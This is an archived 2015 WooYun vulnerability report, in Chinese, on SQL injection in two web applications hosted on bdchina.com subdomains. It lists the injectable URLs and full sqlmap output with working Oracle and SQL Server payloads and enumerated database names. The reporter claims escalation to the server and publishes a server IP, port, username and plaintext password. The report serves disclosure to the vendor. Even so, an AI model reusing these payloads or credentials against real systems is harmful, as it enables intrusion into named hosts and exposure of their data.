乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-12: 细节已通知厂商并且等待厂商处理中 2015-02-17: 厂商已经确认,细节仅向厂商公开 2015-02-27: 细节向核心白帽子及相关领域专家公开 2015-03-09: 细节向普通白帽子公开 2015-03-19: 细节向实习白帽子公开 2015-03-29: 细节向公众公开
首先说明一下,这个洞我去年10月份在补天平台提交过,今天偶然去看了下还没有修复,提交到这里并不是一洞双投,只是希望尽快让厂商修复,RANK奖励什么我都可以不要!厂商貌似隶属于中国联通山东分公司!
1.注入点
http://enpower.bdchina.com:8001/jxt/news/bulletinTemplate.jsp?id=1992http://enpower.bdchina.com:8001/jxt/news/newsTemplate.jsp?id=2117
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2117 AND 6997=6997 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: id=2117 AND 7156=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(114)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (7156=7156) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(106)||CHR(102)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=2117 AND 4709=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(110)||CHR(81)||CHR(80),5)---[12:43:38] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[12:43:38] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[12:43:38] [INFO] fetching database (schema) names[12:43:39] [INFO] the SQL query used returns 28 entries[12:43:39] [INFO] retrieved: CTXSYS[12:43:40] [INFO] retrieved: HR[12:43:41] [INFO] retrieved: JIAXIAOTONG[12:43:41] [INFO] retrieved: JXTFORUM[12:43:42] [INFO] retrieved: JXTIM[12:43:42] [INFO] retrieved: JXTT[12:43:43] [INFO] retrieved: MDSYS[12:43:43] [INFO] retrieved: ODM[12:43:44] [INFO] retrieved: ODM_MTR[12:43:45] [INFO] retrieved: OE[12:43:45] [INFO] retrieved: OLAPSYS[12:43:46] [INFO] retrieved: ORDSYS[12:43:46] [INFO] retrieved: OUTLN[12:43:47] [INFO] retrieved: PM[12:43:48] [INFO] retrieved: QS[12:43:48] [INFO] retrieved: QS_CBADM[12:43:49] [INFO] retrieved: QS_CS[12:43:49] [INFO] retrieved: QS_ES[12:43:50] [INFO] retrieved: QS_OS[12:43:51] [INFO] retrieved: QS_WS[12:43:51] [INFO] retrieved: RMAN[12:43:52] [INFO] retrieved: SCOTT[12:43:52] [INFO] retrieved: SH[12:43:53] [INFO] retrieved: SYS[12:43:54] [INFO] retrieved: SYSTEM[12:43:54] [INFO] retrieved: WKSYS[12:43:55] [INFO] retrieved: WMSYS[12:43:55] [INFO] retrieved: XDBavailable databases [28]:[*] CTXSYS[*] HR[*] JIAXIAOTONG[*] JXTFORUM[*] JXTIM[*] JXTT[*] MDSYS[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDB[12:43:55] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 62 times[12:43:55] [INFO] fetched data logged to text files under 'C:\sqlmap\output\enpower.bdchina.com'[*] shutting down at 12:43:55
2.注入点
http://xiangcesw.bdchina.com/taphoto.aspx?ID=7197&ZID=902http://xiangcesw.bdchina.com/pic_all.aspx?ZID=902http://xiangcesw.bdchina.com/photoOtherHomeFolder.aspx?ID=7197http://xiangcesw.bdchina.com/searchFolder.aspx?BID=%E6%88%B7%E5%A4%96%20%E8%BF%90%E5%8A%A8
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=7574' AND 8430=8430 AND 'ksbY'='ksbY Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=7574' AND 8238=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (8238=8238) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'DKvK'='DKvK Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=7574'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=7574' WAITFOR DELAY '0:0:5'-----[12:44:11] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[12:44:11] [INFO] fetching database names[12:44:11] [INFO] the SQL query used returns 8 entries[12:44:11] [INFO] resumed: master[12:44:11] [INFO] resumed: model[12:44:11] [INFO] resumed: msdb[12:44:11] [INFO] resumed: ReportServer[12:44:11] [INFO] resumed: ReportServerTempDB[12:44:11] [INFO] resumed: tempdb[12:44:11] [INFO] resumed: xiangce[12:44:11] [INFO] resumed: xiangce_iptvavailable databases [8]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] xiangce[*] xiangce_iptv[12:44:11] [INFO] fetched data logged to text files under 'C:\sqlmap\output\xiangcesw.bdchina.com'[*] shutting down at 12:44:11
sa权限,直接提权到服务器了!
61.156.7.61:7788 帐号caibi 密码115175
严格过滤!
危害等级:高
漏洞Rank:15
确认时间:2015-02-17 08:19
暂无